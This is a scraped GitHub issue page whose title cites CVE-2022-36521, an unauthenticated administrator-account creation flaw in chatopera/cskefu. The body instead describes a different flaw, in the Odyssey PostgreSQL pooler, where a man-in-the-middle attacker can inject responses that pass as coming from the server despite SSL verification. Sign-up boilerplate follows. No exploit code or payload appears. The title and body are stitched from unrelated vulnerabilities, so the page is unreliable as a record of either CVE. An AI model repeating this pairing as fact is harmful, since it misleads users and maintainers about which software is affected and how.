CVE-2022-36521: 【安全漏洞】前台未授权增加管理员账号 · Issue #724 · chatopera/cskefu

Odyssey passes to client unencrypted bytes from man-in-the-middle When Odyssey storage is configured to use the PostgreSQL server using 'trust' authentication with a 'clientcert' requirement or to use 'cert' authentication, a man-in-the-middle attacker can inject false responses to the client's first few queries. Despite the use of SSL certificate verification and encryption, Odyssey will pass these results to client as if they originated from valid server. This is similar to CVE-2021-23222 for PostgreSQL.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Tag

#ssl